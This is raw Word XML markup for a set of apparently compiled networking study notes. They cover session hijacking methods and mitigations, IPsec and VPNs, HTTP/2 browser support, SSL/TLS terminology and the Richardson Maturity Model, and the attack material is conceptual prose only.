        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="999999"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Corporate Endpoint Desktop Threats</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="999999"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Corporate WAN Threats</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="999999"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Data Center Networking Threats</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="999999"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>IT Threats</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>   -  </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b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Session Hijacking Attack</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b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Introduction  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Also known as man in the middle attacks, session hijacking deceives a server or a client into accepting the upstream host as the actual legitimate host. Instead the upstream host is an attacker’s host that is manipulating the network so the attacker’s host appears to be the desired destination.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Session hijacking is a method of taking over a Web user session by surreptitiously obtaining the session ID and masquerading as the authorized user. Once the user’s session ID has been accessed (through session prediction), the attacker can masquerade as that user and do anything the user is authorized to do on the network.</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Session hijacking is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim’s computer</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A popular method is using source-routed IP packets. This allows a hacker at point A on the network to participate in a conversation between B and C by encouraging the IP packets to pass through its machine.</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If source-routing is turned off, the hacker can use “blind” hijacking, whereby it guesses the responses of the two machines. Thus, the hacker can send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net.</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A hacker can also be “inline” between B and C using a sniffing program to watch the conversation. This is known as a “man-in-the-middle attack“.</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 </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b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Methods</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There are four main methods used to perpetrate a session hijack. These are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Session fixation, where the attacker sets a user’s session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Session </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sidejacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows him to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Alternatively, an attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user’s computer or the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Cross-site scripting, where the attacker tricks the user’s computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.</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 </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b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Mitigation</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Methods to prevent session hijacking include:</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Encryption of the data traffic passed between the parties; in particular the session key, though ideally all traffic for the entire session by using SSL/TLS. This technique is widely relied-upon by web-based banks and other e-commerce services, because it completely prevents sniffing-style attacks. However, it could still be possible to perform some other kind of session hijack.</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Use of a long random number or string as the session key. This reduces the risk that an attacker could simply guess a valid session key through trial and error or brute force attacks.</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Regenerating the session id after a successful login. This prevents session fixation because the attacker does not know the session id of the user after s/he has logged in.</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Some services make secondary checks against the identity of the user. For example, a web server could check with each request made that the IP address of the user matched the one last used during that session. This does not prevent attacks by somebody who shares the same IP address, however, and could be frustrating for users whose IP address is liable to change during a browsing session.</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Alternatively, some services will change the value of the cookie with each and every request. This dramatically reduces the window in which an attacker can operate and makes it easy to identify whether an attack has taken place, but can cause other technical problems (for example, two legitimate, closely timed requests from the same client can lead to a token check error on the server).</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 xml:space="preserve">Users may also wish to log out of websites whenever they are finished using them. However this will not protect against attacks such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Firesheep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Configure authentication and integrity checking between VPN endpoints.</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lastRenderedPageBreak/>
        <w:t> </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Other methods for prevention are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Virtual private networks (VPNs) allow secure access to corporate resources by establishing an encrypted tunnel across the Internet. The ubiquity of the Internet, combined with the VPN technologies of today, allows organizations to cost-effectively and securely extend the reach of their networks to anyone, anyplace, anytime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9" w:rsidP="00B861C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="375"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IPSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a framework of open standards developed by the Internet Engineering Task Force (IETF) that provides security for transmission of sensitive information over unprotected networks such as the Internet. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IPSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> acts at the network layer, protecting and authenticating IP packets between participating </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IPSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> devices (“peers”) such as Cisco routers.</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 xml:space="preserve">IPsec is designed to provide interoperable, high-quality, and cryptographically based security. IPsec is defined in (RFC 2401). The set of security services offered includes access control, connectionless integrity, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> origin authentication, protection against replays, confidentiality (encryption), and limited traffic flow confidentiality. These services are provided at the IP layer, offering protection for IP and upper-layer protocols (ULPs). Because these services are provided at the IP layer, they can be used by any higher-layer protocol (for example TCP, User Datagram Protocol [UDP], and Border Gateway Protocol [BGP]).</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IPsec provides security services at the IP layer by enabling a system to select required security protocols, determine the algorithm (or algorithms) to use for the service (or services), and put in place any cryptographic keys required to provide the requested services. IPsec can be used to protect one or more paths between a pair of hosts, between a pair of security gateways, or between a security gateway and a host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B861C9" w:rsidRDefault="00B861C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B26CF" w:rsidRDefault="003B26CF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B26CF" w:rsidRDefault="003B26CF" w:rsidP="003B26CF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="375"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="142748"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="142748"/>
        </w:rPr>
        <w:t>What Browsers Support HTTP/2?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B26CF" w:rsidRDefault="003B26CF" w:rsidP="003B26CF">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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E495B"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E495B"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The latest releases of </w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="37C8B9"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="none"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Firefox</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E495B"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="37C8B9"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="none"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Microsoft Edge</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E495B"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, internet Explorer 11, and </w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="37C8B9"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="none"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Chrome</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E495B"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> already support HTTP/2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:instrText xml:space="preserve"> HYPERLINK "https://blog.cloudflare.com/introducing-http2/" </w:instrText>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="37C8B9"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>CloudFlare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="37C8B9"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> measured</w:t>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="37C8B9"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E495B"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> the traffic over different browsers running through its system over a 48 hour period:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B26CF" w:rsidRDefault="003B26CF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD62C0" w:rsidRDefault="00BD62C0" w:rsidP="00BD62C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TLS is the new name for SSL. Namely, SSL protocol got to version 3.0; TLS 1.0 is "SSL 3.1". TLS versions currently defined include TLS 1.1 and 1.2. Each new version adds a few features and modifies some internal details. We sometimes say "SSL/TLS".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD62C0" w:rsidRDefault="00BD62C0" w:rsidP="00BD62C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HTTPS is HTTP-within-SSL/TLS. SSL (TLS) establishes a secured, bidirectional tunnel for arbitrary binary data between two hosts. HTTP is a protocol for sending requests and receiving answers, each request and answer consisting of detailed headers and (possibly) some content. HTTP is meant to run over a bidirectional tunnel for arbitrary binary data; when that tunnel is an SSL/TLS connection, then the whole is called "HTTPS".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD62C0" w:rsidRDefault="00BD62C0" w:rsidP="00BD62C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To explain the acronyms:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD62C0" w:rsidRDefault="00BD62C0" w:rsidP="00BD62C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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lastRenderedPageBreak/>
        <w:t>"SSL" means "Secure Sockets Layer". This was coined by the inventors of the first versions of the protocol, Netscape (the company was later bought by AOL).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD62C0" w:rsidRDefault="00BD62C0" w:rsidP="00BD62C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="1B608A"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>TLS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>" means "Transport Layer Security". The name was changed to avoid any legal issues with Netscape so that the protocol could be "open and free" (and published as a </w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="1B608A"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>RFC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>). It also hints at the idea that the protocol works over any bidirectional stream of bytes, not just Internet-based sockets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD62C0" w:rsidRDefault="00BD62C0" w:rsidP="00BD62C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="1B608A"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>HTTPS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>" is supposed to mean "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>HyperText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> Transfer Protocol Secure", which is grammatically unsound. Nobody, except the terminally bored pedant, ever uses the translation; "HTTPS" is better thought of as "HTTP with an S that means SSL". Other protocol acronyms have been built the same way, e.g. SMTPS, IMAPS, FTPS... all of them being a bare protocol that "got secured" by running it within some SSL/TLS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD62C0" w:rsidRDefault="00BD62C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A7BF9" w:rsidRDefault="005A7BF9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A7BF9" w:rsidRDefault="005A7BF9" w:rsidP="005A7BF9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Richardson Maturity Model</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7BF9" w:rsidRDefault="005A7BF9" w:rsidP="005A7BF9">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Richardson Maturity Model is used to identify the maturity level of a Restful Web Service. Following are the different levels and their characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7BF9" w:rsidRDefault="005A7BF9" w:rsidP="005A7BF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Level </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>0 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> Expose SOAP web services in REST style. Expose action based services (http://server/getPosts, http://server/deletePosts, http://server/doThis, http://server/doThat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>) using REST.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7BF9" w:rsidRDefault="005A7BF9" w:rsidP="005A7BF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Level </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
